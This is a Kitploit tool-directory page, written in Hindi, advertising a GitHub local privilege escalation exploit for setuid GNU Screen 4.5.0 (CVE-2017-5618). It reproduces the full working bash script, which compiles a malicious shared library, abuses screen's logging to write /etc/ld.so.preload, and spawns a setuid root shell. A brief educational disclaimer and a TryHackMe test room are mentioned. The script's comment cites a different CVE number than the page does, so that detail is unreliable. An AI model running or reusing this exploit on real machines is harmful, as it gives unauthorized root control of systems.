Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — GNU Screen 4.5.0 (CVE-2017-5618) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण। लॉगिंग सुविधा में एक भेद्यता का फायदा उठाकर साझा लाइब्रेरी लोडिंग को हाईजैक करता है और ld.so.preload हेरफेर के माध्यम से रूट एक्सेस प्राप्त करता है। असुरक्षित: Screen 4.5.0 (SUID) इसमें ठीक किया गया: Screen 4.6.0+ | Kitploit
उपकरण/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषणलैब और अभ्यास
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GNU Screen 4.5.0 (CVE-2017-5618) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण। लॉगिंग सुविधा में एक भेद्यता का फायदा उठाकर साझा लाइब्रेरी लोडिंग को हाईजैक करता है और ld.so.preload हेरफेर के माध्यम से रूट एक्सेस प्राप्त करता है। असुरक्षित: Screen 4.5.0 (SUID) इसमें ठीक किया गया: Screen 4.6.0+

साझा करें
3211 महीने पहलेअभी तक समीक्षित नहीं

GNU Screen 4.5.0 स्थानीय विशेषाधिकार वृद्धि शोषण (CVE-2017-5618)

📌 अवलोकन

GNU Screen 4.5.0 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो साझा लाइब्रेरी लोडिंग को हाईजैक करके ld.so.preload हेरफेर के माध्यम से रूट एक्सेस प्राप्त करता है।

🔧 तकनीकी विवरण

कमजोरी: CVE-2017-5618

प्रकार: ld.so.preload के माध्यम से साझा लाइब्रेरी हाईजैकिंग

प्रभावित: केवल GNU Screen 4.5.0

ठीक किया गया: GNU Screen 4.6.0+ में

🎪 कमजोरी का सर्कस

CVE: 2017-5618 🎯

बग: Screen 4.5.0 लॉग फ़ाइलों को खतरनाक अनुमतियों के साथ बनाता है

जादू: हम इसे /etc/ld.so.preload बनाने के लिए धोखा देते हैं जो हमारी दुर्भावनापूर्ण लाइब्रेरी लोड करता है

पेलोड: तुरंत रूट शेल! 🐚

स्क्रिप्ट 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

स्क्रीनशॉट

कमजोर Screen संस्करण की जाँच।

Screen version detected

फ़ाइल बनाना और आवश्यक अनुमतियाँ देना।

Making

रूट एक्सेस प्राप्त हुआ।

Root

रूट शेल प्राप्त - पूर्ण सिस्टम नियंत्रण

⚠️ चेतावनी लेबल

केवल शैक्षिक उपयोग के लिए! ⚠️ स्क्रिप्ट किडी मत बनो - इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है।

परीक्षण किया गया

TryHackMe KOTH Room - Food

टूल डाउनलोड करें